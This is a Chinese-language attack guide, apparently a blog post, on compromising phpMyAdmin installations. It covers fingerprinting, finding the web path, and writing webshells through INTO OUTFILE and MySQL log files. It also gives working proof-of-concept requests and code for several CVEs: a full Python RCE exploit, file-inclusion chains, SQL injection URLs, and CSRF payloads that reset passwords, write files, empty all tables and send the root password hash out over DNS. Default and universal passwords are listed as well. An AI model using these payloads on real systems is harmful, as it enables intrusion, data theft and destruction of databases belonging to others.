一顆小胡椒
一、什么是phpmyadmin?
phpMyAdmin 是一個以PHP為基礎,以Web-Base方式架構在網站主機上的MySQL的數據庫管理工具,讓管理者可用Web接口管理MySQL數據庫。借由此Web接口可以成為一個簡易方式輸入繁雜SQL語法的較佳途徑,尤其要處理大量資料的匯入及匯出更為方便。其中一個更大的優勢在于由于phpMyAdmin跟其他PHP程式一樣在網頁服務器上執行,但是您可以在任何地方使用這些程式產生的HTML頁面,也就是于遠端管理MySQL數據庫,方便的建立、修改、刪除數據庫及資料表。也可借由phpMyAdmin建立常用的php語法,方便編寫網頁時所需要的sql語法正確性。
它是一個基于Web的MySQL數據庫管理工具,它可以讓用戶通過瀏覽器對MySQL數據庫進行各種操作,如創建、刪除、修改、查詢等。phpmyadmin通常安裝在Web服務器上,通過訪問Web服務器上的某個目錄或文件,如http://example.com/phpmyadmin/或http://example.com/pma/index.php,就可以進入phpmyadmin的登錄界面。phpmyadmin的登錄界面要求用戶輸入MySQL數據庫的用戶名和密碼,如果用戶輸入正確,就可以進入phpmyadmin的主界面,對MySQL數據庫進行管理。
phpmyadmin各版本下載:phpMyAdmin - Files
二、為什么要攻擊phpmyadmin?
- phpmyadmin是一個非常常見和流行的MySQL數據庫管理工具,很多網站都使用它來管理自己的數據庫。
- 如果攻擊者能夠成功攻擊phpmyadmin,就可以獲取到網站的數據庫信息,如用戶數據、敏感數據、后臺賬號等,這對攻擊者來說是非常有價值的。
- 此外,如果攻擊者能夠在phpmyadmin中執行任意代碼,就可以實現對Web服務器的完全控制,從而進一步擴大攻擊范圍和影響。
三、如何攻擊phpmyadmin?
3.1常見的phpMyAdmin漏洞
- 弱密碼:如果攻擊者能夠猜測或破解phpMyAdmin帳戶的密碼,他們就可以訪問數據庫并可能造成危害
- 過時版本:運行過時版本的phpMyAdmin可能會使您的系統容易受到已知漏洞的攻擊。例如,phpmyadmin 4.8.0和4.8.1版本存在遠程文件包含漏洞(CVE-2018-12613
- 遠程文件包含:遠程文件包含(RFI)漏洞允許攻擊者將遠程文件(通常是惡意腳本)包含到Web應用程序中。這可能導致服務器上執行任意代碼
- 遠程代碼執行:遠程代碼執行(RCE)漏洞允許攻擊者在服務器上執行任意代碼。例如,phpmyadmin 4.8.1版本存在此類漏洞
3.2Getshell方法
"Getshell"指在被攻陷的系統上獲得遠程shell的過程。有幾種方法可以通過phpMyAdmin進行getshell:
- Select into Outfile:這種方法涉及使用“SELECT … INTO OUTFILE”SQL語句將webshell寫入服務器上的文件。攻擊者必須知道webroot的絕對路徑并具有對該目錄的寫權限
- 日志文件操作:這種方法涉及操作MySQL日志文件以將webshell寫入服務器上的文件。攻擊者必須具有對日志文件目錄的寫權限并知道webroot的絕對路徑
- 新表:這種方法涉及在數據庫中創建一個新表并將webshell插入其中一個字段。然后,攻擊者必須使用“INTO OUTFILE”語句將該字段的內容寫入服務器上的文件
以上所有方法都需要滿足某些條件,例如具有寫權限并知道webroot的絕對路徑。此外,這些方法可能會在系統上留下痕跡,并可能被安全措施檢測到。
四、phpmyadmin信息收集
4.1 版本信息獲取
獲取phpmyadmin版本信息,在網址根路徑后面添加
readme.php README changelog.php Change Documetation.html Documetation.txt translators.html
(注意區分大小寫)就可以看到phpmyadmin的相關版本信息了,這個方法也是通殺的,只要管理員不把他們刪掉。
4.2 絕對路徑獲取
(1) phpinfo() 頁面:最理想的情況,直接顯示web路徑 (2) web報錯信息:可以通過各種fuzz嘗試讓目標報錯,也有可能爆出絕對路徑 (3) 一些集成的web框架:如果目標站點是利用phpstudy、LAMPP等之類搭建的,可以通過查看數據庫路徑
show variables like '%datadir%';
再猜解web路徑的方法,一般容易成功。
(5)其他方法
1.查看數據庫表內容獲取 有一些cms會保存網站配置文件 或者路徑 2.進入后臺 3.百度出錯信息 zoomeye shadon 搜索error warning 4. @@datadir參數看mysql路徑 反猜絕對路徑
五、PhpMyAdminGetshell
5.1 寫入文件GetShell
可以通過寫shell進行提權,而我們需要滿足以下條件:
1.數據庫root權限 2.知道網站的物理路徑 3.數據庫有寫權限
MySQL 5.0+的版本會,然后在服務運行的情況下修改變量變量也可以移動文件位置的,但是必須要對生成日志的目錄具有可更改的寫權限。(Linux環境下可能會比較苛刻,因為站點目錄是一個用戶,MySQL是另外一個用戶,權限管控較大嚴格,主要取決于權限配置是否得當)
5.1.1 直接寫入文件getshell
直接用into outfile 直接在網站目錄下寫入webshell,但是該方法需要前提條件是: (1) 當前的數據庫用戶有寫權限 (2) 知道web絕對路徑 (3) web路徑能寫
如何判斷當前數據庫用戶有寫權限? 執行:
show variables like '%secure%';
如果secure_file_priv如果非空,則只能在對應的目錄下讀文件,如果是空即可在其他目錄寫。Linux下默認/tmp目錄可寫。
secure_file_priv是MySQL的一個參數,它用于限制MySQL的數據導入和導出操作。 具體來說,它會影響到LOAD DATA、SELECT … INTO OUTFILE語句和LOAD_FILE()函數的執行。 這個參數的值有以下幾種可能性: 如果secure_file_priv的值為null,表示限制mysqld不允許導入或導出。 如果secure_file_priv的值為某個具體的目錄路徑(例如/tmp/),表示限制mysqld的導入或導出只能發生在該目錄下。 如果secure_file_priv沒有具體值,表示不對mysqld的導入或導出做限制。 你可以通過執行SQL語句 show global variables like '%secure%'; 來查看當前的secure_file_priv參數值。 需要注意的是,在MySQL 5.5之前,secure_file_priv默認是空,這個情況下可以向任意絕對路徑寫文件。但在MySQL 5.5之后,secure_file_priv默認是NULL,這個情況下不可以寫文件。 如果你想修改這個參數的值,可以在MySQL的配置文件(Windows下是my.ini,Linux下是my.cnf)中添加或修改secure_file_priv=這一行1。修改后需要重啟MySQL服務才能生效。這樣就可以根據你的需求來控制MySQL的數據導入和導出操作了。
編寫一句phpinfo文件,
select "<?php phpinfo();?>" INTO OUTFILE "d:\\phpstudy\\www\\7.php"
這里必須注意要雙反斜線,否則會轉義,
5.1.2 通過寫入日志文件getshell
讀寫權限+web絕對路徑,修改日志文件為webshell
具體利用方法如下
(1) 開啟日志記錄:
set global general_log = "ON";
(2) 查看當前的日志目錄:
show variables like 'general%';
(3) 指定日志文件
set global general_log_file = "D:/phpStudy/WWW/gouwo.php";
(4)) 寫入執行代碼:
select "<?php phpinfo();?>";
5.1.3 通過慢查詢寫入webshell
具體方法如下:
(1) 查看當前慢查詢日志目錄:
show variables like '%slow%';
(2) 重新設置路徑:
set GLOBAL slow_query_log_file='D:/phpStudy/WWW/gouwo2.php';
(3) 開啟慢查詢日志:
set GLOBAL slow_query_log=on;
(4)) 執行寫入日志:
select '<?php phpinfo();?>' from mysql.db where sleep(10);
5.2 MOF提權:
通過mysql將文件寫入一個MOF文件替換掉原有的MOF文件,然后系統每隔五秒就會執行一次上傳的MOF。一般適用于Windows <= 2003,并且C:\Windows\System32\mof目錄具有寫權限(一般是沒有權限寫)。可以使用MSF直接利用:
use exploit/windows/mysql/mysql_mof set rhost 192.168.106.170 set rport 3306 set password root set username root exploit
六、PhpMyAdmin漏洞利用
6.1 WooYun-2016-199433:任意文件讀取漏洞
影響范圍:
phpMyAdmin version 2.x版本
POC如下:
POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate Accept: */*
Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trid ent/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
6.2 CVE-2014 -8959:本地文件包含
影響范圍:
phpMyAdmin version 4.0.1~4.2.12 PHP version < 5.3.4
POC如下:
/gis_data_editor.php?token=2941949d3768c57b4342d94ace606e91&gis_data[gis_type]=/../../../../phpinfo.txt%00 # 注意改下token值
在實際利用中可以利用寫入文件到/tmp目錄下結合此漏洞完成RCE,php版本可以通過http header、導出表內容到文件的附加內容看到。
6.3 CVE-2016-5734 :后臺命令執行RCE
影響范圍:
phpMyAdmin version 4.0.10.16 之前的4.0.x版本 4.4.15.7 之前的 4.4.x版本 4.6.3之前的 4.6.x版本 PHP version 4.3.0~5.4.6 Php 5.0 版本以上的將 preg_replace 的 /e修飾符給廢棄掉了
POC如下:
#!/usr/bin/env python
"""cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2 authorized user RCE exploit
Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7.
CVE: CVE-2016-5734
Author: https://twitter.com/iamsecurity
run: ./cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');"
"""
import requests
import argparse
import sys
__author__ = "@iamsecurity"
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("url", type=str, help="URL with path to PMA")
parser.add_argument("-c", "--cmd", type=str, help="PHP command(s) to eval()")
parser.add_argument("-u", "--user", required=True, type=str, help="Valid PMA user")
parser.add_argument("-p", "--pwd", required=True, type=str, help="Password for valid PMA user")
parser.add_argument("-d", "--dbs", type=str, help="Existing database at a server")
parser.add_argument("-T", "--table", type=str, help="Custom table name for exploit.")
arguments = parser.parse_args()
url_to_pma = arguments.url
uname = arguments.user
upass = arguments.pwd
if arguments.dbs:
db = arguments.dbs
else:
db = "test"
token = False
custom_table = False
if arguments.table:
custom_table = True
table = arguments.table
else:
table = "prgpwn"
if arguments.cmd:
payload = arguments.cmd
else:
payload = "system('uname -a');"
size = 32
s = requests.Session()
# you can manually add proxy support it's very simple ;)
# s.proxies = {'http': "127.0.0.1:8080", 'https': "127.0.0.1:8080"}
s.verify = False
sql = '''CREATE TABLE `{0}` (
`first` varchar(10) CHARACTER SET utf8 NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `{0}` (`first`) VALUES (UNHEX('302F6500'));
'''.format(table)
# get_token
resp = s.post(url_to_pma + "/?lang=en", dict(
pma_username=uname,
pma_password=upass
))
if resp.status_code is 200:
token_place = resp.text.find("token=") + 6
token = resp.text[token_place:token_place + 32]
if token is False:
print("Cannot get valid authorization token.")
sys.exit(1)
if custom_table is False:
data = {
"is_js_confirmed": "0",
"db": db,
"token": token,
"pos": "0",
"sql_query": sql,
"sql_delimiter": ";",
"show_query": "0",
"fk_checks": "0",
"SQL": "Go",
"ajax_request": "true",
"ajax_page_request": "true",
}
resp = s.post(url_to_pma + "/import.php", data, cookies=requests.utils.dict_from_cookiejar(s.cookies))
if resp.status_code == 200:
if "success" in resp.json():
if resp.json()["success"] is False:
first = resp.json()["error"][resp.json()["error"].find("<code>")+6:]
error = first[:first.find("</code>")]
if "already exists" in error:
print(error)
else:
print("ERROR: " + error)
sys.exit(1)
# build exploit
exploit = {
"db": db,
"table": table,
"token": token,
"goto": "sql.php",
"find": "0/e\0",
"replaceWith": payload,
"columnIndex": "0",
"useRegex": "on",
"submit": "Go",
"ajax_request": "true"
}
resp = s.post(
url_to_pma + "/tbl_find_replace.php", exploit, cookies=requests.utils.dict_from_cookiejar(s.cookies)
)
if resp.status_code == 200:
result = resp.json()["message"][resp.json()["message"].find("</a>")+8:]
if len(result):
print("result: " + result)
sys.exit(0)
print(
"Exploit failed!\n"
"Try to manually set exploit parameters like --table, --database and --token.\n"
"Remember that servers with PHP version greater than 5.4.6"
" is not exploitable, because of warning about null byte in regexp"
)
sys.exit(1)
利用如下:
cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');"
6.4 CVE-2018-12613:后臺文件包含
影響范圍:
phpMyAdmin version 4.8.0和4.8.1
利用如下: (1)執行SQL語句,將PHP代碼寫入Session文件中:
select '<?php phpinfo();exit;?>'
(2)包含session文件:
http://10.1.1.10/index.php?target=db_sql.php%253f/../../../../../../../../var/l ib/php/sessions/sess_*** # *** 為phpMyAdmin的COOKIE值
6.5 CVE-2018-19968:任意文件包含/RCE
影響范圍:
phpMyAdmin version 4.8.0~4.8.3
利用如下: (1)創建數據庫,并將PHP代碼寫入Session文件中
CREATE DATABASE foo;CREATE TABLE foo.bar (baz VARCHAR(100) PRIMARY KEY );INSERT INTO foo.bar SELECT '<?php phpinfo(); ?>';
(2)生成foo數據庫的phpMyAdmin的配置表,訪問:
http://10.1.1.10/chk_rel.php?fixall_pmadb=1&db=foo
(3)篡改數據插入pma column_info中:
INSERT INTO` pma__column_infoSELECT '1', 'foo', 'bar', 'baz', 'plop','plop', ' plop', 'plop','../../../../../../../../tmp/sess_***','plop'; # *** 為phpMyAdmin 的COOKIE值
這里要注意不用系統的session保存位置不同,具體系統可以在phpMyAdmin登錄后首頁看到
MacOS:
/var/tmp
Linux:
/var/lib/php/sessions
phpStudy:
/phpstudy/PHPTutorial/tmp/tmp
(4)訪問包含Session文件的地址:
http://10.1.1.10/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[ multi_edit][][]=baz&clause_is_unique=1
6.6 CVE-2020-0554:后臺SQL注入
影響范圍:
phpMyAdmin version phpMyAdmin 4< 4.9.4 phpMyAdmin 5< 5.0.1 前提:已知一個用戶名密碼
簡單總結流程:
頁面位置server_privileges.php;
設置變量ajax_requests為true;
設置變量validate_username 為真值;
設置變量username 為我們拼接的注入語句。
構造payload:
http://192.168.209.139:8001/server_privileges.php?ajax_requests=true&validate_username=1&username=1%27or%201=1%20--+db=&token=c2064a8c5f437da931fa01de5aec6581&viewing_mode=server
(token和其余參數會在訪問頁面的時候自動提供)
我們查看后端收到的數據,可以看到SQL已經成功拼接。
執行完畢后程序只會告知SQL是否執行成功,失敗會報錯,因此此處我們可以利用報錯注入。
構造payload:
http://192.168.209.139:8001/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))--+db=&token=c2064a8c5f437da931fa01de5aec6581&viewing_mode=server
可以看到已經成功執行了我們注入的指令。
參考鏈接CVE-2020-0554:phpMyAdmin后臺SQL注入
6.7 CVE-2019-12922 跨站請求偽造
影響范圍:
phpMyAdmin version <= 4.9.0.1
利用如下:
在登錄狀態下,添加一個服務器
http://127.0.0.1/phpmyadmin/setup/index.php
點擊刪除時,通過工具抓包
參數id對應的是第幾個服務器。構造惡意鏈接。
當然實戰中的鏈接怎么吸引人讓目標去點擊還得靠自己去構造。
頁面顯示404,但img的src會去請求一次。此時創建了兩個服務器
點擊我們構造的惡意鏈接時,顯示剛才構造的頁面結果
此時再去查看服務器
已經被刪除,攻擊成功。
參考鏈接:CVE-2019-12922 phpMyAdmin 4.9.0.1-跨站請求偽造漏洞復現
6.8 CVE-2017-1000499 跨站請求偽造
影響范圍:
phpMyAdmin version Phpmyadmin:4.7.6 Phpmyadmin:4.7.0:Beta1 Phpmyadmin:4.7.0:Rc1 Phpmyadmin:4.7.5 Phpmyadmin:4.7.4
POC如下:
# Exploit Title: phpMyAdmin 4.7.x - Cross-Site Request Forgery
# Date: 2018-08-28
# Exploit Author: VulnSpy
# Vendor Homepage: https://www.phpmyadmin.net/
# Software Link: https://www.phpmyadmin.net/downloads/
# Version: Versions 4.7.x (prior to 4.7.7)
# Tested on: php7 mysql5
# CVE: CVE-2017-1000499
# Exploit CSRF - Modifying the password of current user
<p>Hello World</p>
<img src="
http://7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=SET%20password
%20=%20PASSWORD(%27www.vulnspy.com%27)" style="display:none;" />
# Exploit CSRF - Arbitrary File Write
<p>Hello World</p>
<img src="
http://7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=select
'<?php phpinfo();?>' into outfile '/var/www/html/test.php';"
style="display:none;" />
# Exploit CSRF - Data Retrieval over DNS
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE
user='root' LIMIT 1),'.vulnspy.com\\test'));
# Exploit CSRF - Empty All Rows From All Tables
<p>Hello World</p>
<img src="
http://7f366ec1afc5832757a402b5355132d0.vsplate.me/import.php?db=mysql&table=user&sql_query=DROP+PROCEDURE+IF+EXISTS+EMPT%3B%0ADELIMITER+%24%24%0A++++CREATE+PROCEDURE+EMPT%28%29%0A++++BEGIN%0A++++++++DECLARE+i+INT%3B%0A++++++++SET+i+%3D+0%3B%0A++++++++WHILE+i+%3C+100+DO%0A++++++++++++SET+%40del+%3D+%28SELECT+CONCAT%28%27DELETE+FROM+%27%2CTABLE_SCHEMA%2C%27.%27%2CTABLE_NAME%29+FROM+information_schema.TABLES+WHERE+TABLE_SCHEMA+NOT+LIKE+%27%25_schema%27+and+TABLE_SCHEMA%21%3D%27mysql%27+LIMIT+i%2C1%29%3B%0A++++++++++++PREPARE+STMT+FROM+%40del%3B%0A++++++++++++EXECUTE+stmt%3B%0A++++++++++++SET+i+%3D+i+%2B1%3B%0A++++++++END+WHILE%3B%0A++++END+%24%24%0ADELIMITER+%3B%0A%0ACALL+EMPT%28%29%3B%0A"
style="display:none;" />
參考鏈接:CVE-2017-1000499
七、特殊版本GetShell
7.1 CVE-2013-3238
影響版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 ANYUN.ORG
利用模塊:exploit/multi/http/phpmyadminpregreplace
7.2 CVE-2012-5159
影響版本:phpMyAdmin v3.5.2.2
利用模塊:exploit/multi/http/phpmyadmin3522_backdoor
7.3 CVE-2009-1151
PhpMyAdmin配置文件/config/config.inc.php存在命令執行
影響版本:2.11.x < 2.11.9.5 and 3.x < 3.1.3.1 利用模塊:exploit/unix/webapp/phpmyadmin_config
7.4 弱口令&萬能密碼
弱口令:版本phpmyadmin2.11.9.2, 直接root用戶登陸,無需密碼
萬能密碼:版本2.11.3 / 2.11.4,用戶名'localhost'@'@"則登錄成功
系統安全運維
虹科網絡安全
瀟湘信安
系統安全運維
合天網安實驗室
安全圈
安全圈
系統安全運維
關鍵基礎設施安全應急響應中心
黑白之道
LemonSec
GoUpSec
